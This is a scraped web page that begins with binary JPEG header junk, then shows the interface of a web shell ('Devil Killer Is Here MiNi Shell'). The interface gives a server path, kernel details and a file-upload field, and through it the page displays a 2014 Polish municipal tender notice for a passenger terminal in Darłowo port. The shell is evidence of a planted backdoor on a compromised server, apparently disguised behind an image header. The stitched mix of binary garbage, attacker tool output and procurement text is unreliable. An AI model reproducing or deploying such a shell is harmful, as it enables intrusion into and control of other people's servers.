JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140529/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140529/181860-N-2014.html

<p class="kh_header"><b>Darłowo: Budowa terminala pasażerskiego w porcie Darłowo</b><br>
<b>Numer ogłoszenia: 181860 - 2014; data zamieszczenia: 29.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Darłowo , Plac Tadeusza Kościuszki 9, 76-150 Darłowo, woj. zachodniopomorskie, tel. 94 3142223 do 26, faks 94 3142333.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.darlowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa terminala pasażerskiego w porcie Darłowo.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 4.3.	W ramach realizacji przedmiotu zamówienia przeprowadzone zostaną prace związane 
z budową budynku terminala pasażerskiego i zagospodarowaniem terenu przyległego na działkach: 1/40 oraz 1/54, obręb 2 miasta Darłowo.

4.3.1. Zakres przedmiotu zamówienia obejmuje wykonanie robót budowlanych w następujących elementach:

1) roboty ziemne,

2) konstrukcja obejmująca wykonawstwo fundamentów z izolacjami, stropów sprężonych, wylewki żelbetowe, słupy żelbetowe, ramę żelbetową, belki żelbetowe, schody żelbetowe, wieńce żelbetowe, konstrukcję stalową,

3) roboty murowe obejmujące wykonanie ścian zewnętrznych - attyka, ścian wewnętrznych, ścian działowych, kominów, nadproży,

4) wykończenie zewnętrzne obejmujące m.in.: wykonanie dachu, obróbek blacharskich, stolarki 
i ślusarki zewnętrznej, elewację, obróbki kominów, attyk, tarasu widokowego nad parterem,

5) wykończenie wewnętrzne obejmujące wykonanie m.in.: podkłady i posadzki, sufity, ścianki działowe poddasza, tynki wewnętrzne ścian, malowanie i licowanie ścian, stolarkę i ślusarkę wewnętrzną,

6) zagospodarowanie terenu obejmujące wykonanie: chodników i trawników,

7) wykonanie instalacji:
- elektrycznej,
- sanitarnej wewnętrznej (wodociągowa, hydrant, sanitarna, gazowa, kanalizacji deszczowej, wentylacji mechanicznej),

8) wykonanie przyłączy sanitarnych:
- wodociągowe,
- kanalizacji sanitarnej,
- kanalizacji deszczowej,
- przyłącze gazowe.

4.4. Przedmiot zamówienia obejmuje również:
- organizację i zagospodarowanie zaplecza budowy,
- pełną obsługę geodezyjną w trakcie wykonywania prac,
- zorganizowanie i przeprowadzenie niezbędnych prób, badań przez wyspecjalizowane i uprawnione laboratoria (wszystkie badania laboratoryjne niezbędne do odbioru robót zanikających) oraz ewentualnego uzupełnienia dokumentacji odbiorowej dla zakresu robót objętych przedmiotem przetargu,
- sporządzenie dokumentacji powykonawczej, łącznie z dokumentacją powykonawczą geodezyjną wszystkich prac , zatwierdzoną przez odpowiedni z uwagi na lokalizację robót, Urząd Geodezji 
i Kartografii,
- po zakończeniu robót doprowadzenie do stanu pierwotnego terenu zaplecza budowy, demontaż obiektów tymczasowych oraz uporządkowanie terenu,
- sporządzenie protokołów badań i sprawdzeń oraz uzyskanie wszelkich niezbędnych uzgodnień,
- sporządzenie świadectwa charakterystyki energetycznej budynku,
- załączenie kart katalogowych potwierdzających spełnienie podstawowych założeń odnośnie zastosowanych materiałów dla niżej wymienionych elementów:

Wykończenie tarasu - system tarasowy kompozytowy. System mocowania desek o estetycznym wykończeniu, bez konieczności przewiercania wkrętami powierzchni desek. Deska kompozytowa szerokości 140 mm, grubości 28 mm, ryflowana. Deska musi charakteryzować się odpornością na ścieranie,  posiadać właściwości antypoślizgowe, posiadać znikomą nasiąkliwość co będzie wpływało na jej zastosowanie w środowisku o podwyższonej wilgotności. Materiał wykorzystany do produkcji desek powinien być w stu procentach poddany recyklingowi. Deska tarasowa nie powinna wymagać konserwacji w trakcie użytkowania oraz być odporna na grzyby i szkodniki drewna. System tarasowy powinien posiadać Aprobatę techniczną ITB, posiadać klasyfikację w zakresie reakcji na ogień Bfl oraz wydzielania dymu s1. Dodatkowo system tarasowy powinien posiadać Atest Higieniczny. Kolor deski do uzgodnienia przed montażem. Powyższy opis stanowi również wyznaczenie parametrów równoważności w prowadzonym postępowaniu przetargowym.

Drzwi wewnętrzne - wg zestawienia stolarki PB. Skrzydło na ramiaku drewnianym klejonym 
z drewna iglastego z wkładem stabilizującym. Szerokość drzwi wg zestawienia. Płyta drzwiowa oklejona wysokiej jakości okleiną naturalną (kolor orzech, orzech jasny, orzech amerykański) . Skrzydła uzupełnione aluminiowymi intarsjami w kolorze srebrnym o szerokości 6 mm. Całość wykończona lakierem matowym. Wypełnienie stanowi płyta wiórowa otworowa. Zamek z czołem srebrnym dostosowany pod wkładkę patentową - oprócz drzwi do WC. Drzwi WC z blokadą WC. Skrzydło z trzema zawiasami w kolorze srebrnym. Ościeżnica regulowana w okleinie identycznej jak skrzydła drzwiowe. Ościeżnice wykonane z materiałów drewnopochodnych i wyposażonych 
w niezbędne okucia i akcesoria. Powyższy opis stanowi również wyznaczenie parametrów równoważności w prowadzonym postępowaniu przetargowym.

Okładziny zewnętrzne - wg rysunku elewacji. Cegła klinkierowa o wymiarach 240x71x115 mm. Kolor postarzana cegła czerwono-żółta cieniowana. Cegła powinna charakteryzować się wytrzymałością minimalną 35N/mm2, nasiąkliwością do 6 %, powinna być mrozoodporna - kategoria F2, kwasoodporna, ługoodporna, reakcja na ogień klasy A1. Płytki okładzinowe w dwóch kolorach. Płytka biała - perłowo-biała o wymiarach 240x71x14 mm. Nasiąkliwość do max 3 %. Płytka powinna charakteryzować się odpornością na zabrudzenia. Płytka ciemna antracytowa gładka o wymiarach 240x71x14 mm. Nasiąkliwość do 6%. Płytka mrozoodporna, kwasoodporna, ługoodporna o reakcji na ogień klasy A1. Powyższy opis stanowi również wyznaczenie parametrów równoważności 
w prowadzonym postępowaniu przetargowym.

Krycie dachu - dachówka ceramiczna płaska o wymiarach 437x257mm. Kolor grafitowy. Powierzchnia dachówki powinna pokryta być fabrycznie glazurą, która umożliwia samoistne oczyszczanie oraz znacząco podnosi trwałość dachówki. Powyższy opis stanowi również wyznaczenie parametrów równoważności w prowadzonym postępowaniu przetargowym.

Płytki do wykończenia wnętrz - pokrycie schodów i podłóg wg rzutów architektonicznych, dodatkowo płytkami powinno obłożyć się schody na I piętro. Płytki podłogowe we wszystkich pomieszczenia poza 03 oraz 04 o wymiarach min. 29,7x29,7 gres szkliwiony grubości 8mm klasy ścieralności kl. 5, antypoślizgowość R11, mrozoodporna, kolor szary bądź odcienie szarości. Płytki 
w gatunku I (pierwszym). W pomieszczeniach toalet, łazienek i pom. kotłowni należy zastosować płytki: ściany (cała wysokość pomieszczenia) - płytka o wymiarach 29,7x 59,8 gr. 8,5 mm 
o powierzchni matowej, strukturalnej w klasie ścieralności kl. 5, antypoślizgowość R9, mrozoodporna. Kolor jasny, beżowy do uzgodnień na etapie wykonawstwa. Podłoga: wymiary min. 29,7x29,7 cm gr. 8 mm rodzaj powierzchni matowa, strukturalna w klasie ścieralności kl. 5, antypoślizgowość R9, mrozoodporna. Kolor jasny, beżowy do uzgodnień na etapie wykonawstwa. Powyższy opis stanowi również wyznaczenie parametrów równoważności w prowadzonym postępowaniu przetargowym.

Wykładzina dywanowa - pomieszczenia 03 oraz 04. Wykładzina klasy 33 wg PN-EN 685. Gramatura netto wykładziny (waga runa) co najmniej 600 g/m2. Wykładzina wykonana z poliamidu. Wykładzinę powinna charakteryzować klasa odporności ogniowej Bfl-s1 (PN-EN13501-1). Kolor wykładziny do ustalenia na etapie realizacji. Powyższy opis stanowi również wyznaczenie parametrów równoważności w prowadzonym postępowaniu przetargowym.

Biały montaż sanitarny - Ustępy sanitarne systemowe, wiszące, montowane do konstrukcji podtynkowej. Umywalki pojedyncze podblatowe, syfon ze stali nierdzewnej, baterie stojące.  W WC dla niepełnosprawnych ustęp oraz umywalka przystosowana dla osób niepełnosprawnych, wymagane atestowane poręcze i pochwyty. 

4.5.	Szczegółowy opis przedmiotu zamówienia został określony w dokumentacji projektowej oraz w specyfikacjach technicznych wykonania i odbioru robót stanowiących Rozdział IV niniejszej Specyfikacji Istotnych Warunków Zamówienia.
UWAGA !!!

W dokumentacji projektowej (projektach budowlanych, specyfikacjach technicznych, przedmiarach) realizowanego zadania mogą występować materiały opisane znakami towarowymi, a nawet nazwami producentów. Materiały te należy traktować jako przykładowe. Zamawiający dopuszcza zastosowanie materiałów równoważnych 
o nie gorszych parametrach i jakości wykonania. 

W przypadku zamiany materiałów Wykonawcy powinni przedstawić równoważną technicznie propozycję zaznaczając wyraźnie w ofercie, w oddzielnym załączniku, zmienione pozycje, dostarczając wtedy obowiązkowo wszystkie informacje konieczne do kompletnej oceny rozwiązania równoważnego przez Zamawiającego, gdyż to na Wykonawcy spoczywa ciężar wykazania równoważności treści składanej oferty. Ocena równoważności zastosowanych materiałów dokonana zostanie przez Zamawiającego po uzyskaniu opinii projektanta. 

Zamawiający dopuszcza również możliwość zamiany materiałów w czasie realizacji zamówienia przy zachowaniu warunków odnoszących się do dostarczenia materiałów służących ocenie równoważności.

W wyniku prowadzonych robót budowlanych przez pierwszego wykonawcę wykonano:
- wykop - zaawansowanie wg obmiaru inwentaryzacyjnego - 402,68 m2 co stanowi 
97,4 % tego elementu;
- ułożenie geowłókniny separującej - zaawansowanie wg obmiaru inwentaryzacyjnego - 402,68 m2 co stanowi 97,4 % tego elementu;
- wymianę gruntu na piasek średni  - 402,68 m2 x 0,5 m = 201,34 m3 - co stanowi 
97,4 % tego elementu;
- wykonano podkłady z chudego betonu w ilości 14,34 m3 - co stanowi 91 % tego elementu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.33.41-5, 45.26.22.00-3, 45.26.25.00-6, 45.26.00.00-7, 45.42.00.00-7, 45.44.30.00-4, 45.45.00.00-6, 45.11.12.91-4, 45.31.10.00-0, 45.31.23.10-3, 45.33.00.00-9, 45.33.10.00-6, 45.33.24.00-7, 45.33.30.00-0, 45.23.13.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 15.1.	Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 30.000,00zł. (słownie: trzydzieści tysięcy złotych 00/100).
15.2.	Wadium musi być wniesione przed upływem terminu składania ofert w jednej lub kilku formach określonych w art. 45 ust. 6 ustawy. Wadium wnoszone w pieniądzu winno być wpłacone na rachunek bankowy Zamawiającego: 
               Bałtycki Bank Spółdzielczy 09 8566 0003 0001 1149 2000 0002
Za datę wniesienia wadium wnoszonego w pieniądzu uważa się uznania rachunku bankowego Zamawiającego.
15.3.	Wadium wniesione w innej formie niż pieniądz musi być złożone w oryginale. Zamawiający zaleca załączenie oryginału wadium do oferty. 
15.4.	Wadium wnoszone przez konsorcjum w innej formie niż pieniądz może być wnoszone przez poszczególnych konsorcjantów. Ze złożonych dokumentów musi wynikać, że wadium zabezpiecza ofertę złożoną przez Wykonawców wspólnie ubiegających się 
o udzielenie zamówienia.
15.5.	Zamawiający dokona zwrotu wadium, w przypadkach i na zasadach określonych 
w ustawie.
15.6.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
15.7.	Wykonawca, którego oferta zostanie wybrana utraci wadium wraz z odsetkami na rzecz Zamawiającego w przypadkach gdy:
(1)	Odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
(2)	Nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
(3)	Zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonanie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej: 
2 robót budowlanych, polegających na budowie budynku mieszkalno - usługowego lub usługowego, zakresem zbliżonych do będącego przedmiotem realizacji t.j. o pow. użytkowej przekraczającej 350m2  każdy wraz z dokumentami potwierdzającymi, że wymienione ww. wykazie roboty budowlane zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Na potwierdzenie należy dołączyć kserokopię pozwolenia na budowę oraz pozwolenia na użytkowanie.
Ocena spełniania warunków udziału w postępowaniu oraz weryfikacji braku podstaw do wykluczenia z postępowania zostanie dokonana na podstawie złożonych dokumentów w oparciu o  zasadę spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować nw. osobami zdolnymi do wykonania niniejszego zamówienia: Kierownik budowy (jedna osoba) - Uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów - doświadczenie min. 5 lat od chwili uzyskania uprawnień; Kierownik robót sanitarnych (jedna osoba) - Uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów - doświadczenie min. 5 lat od chwili uzyskania uprawnień; Kierownik robót elektrycznych
(jedna osoba) - Uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów - doświadczenie min. 5 lat od chwili uzyskania uprawnień. Ocena spełniania warunków udziału w postępowaniu oraz weryfikacji braku podstaw do wykluczenia z postępowania zostanie dokonana na podstawie złożonych dokumentów w oparciu o  zasadę spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający się o realizację zamówienia: 
(1)	powinien posiadać środki finansowe lub zdolność kredytową na kwotę nie mniejszą niż 800.000,00 zł (słownie: osiemset tysięcy złotych 00/100);
(2)	powinien być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na sumę ubezpieczenia nie mniejszą niż 500.000,00 zł (słownie: pięćset tysięcy złotych 00/100). Ocena spełniania warunków udziału w postępowaniu oraz weryfikacji braku podstaw do wykluczenia z postępowania zostanie dokonana na podstawie złożonych dokumentów w oparciu o  zasadę spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

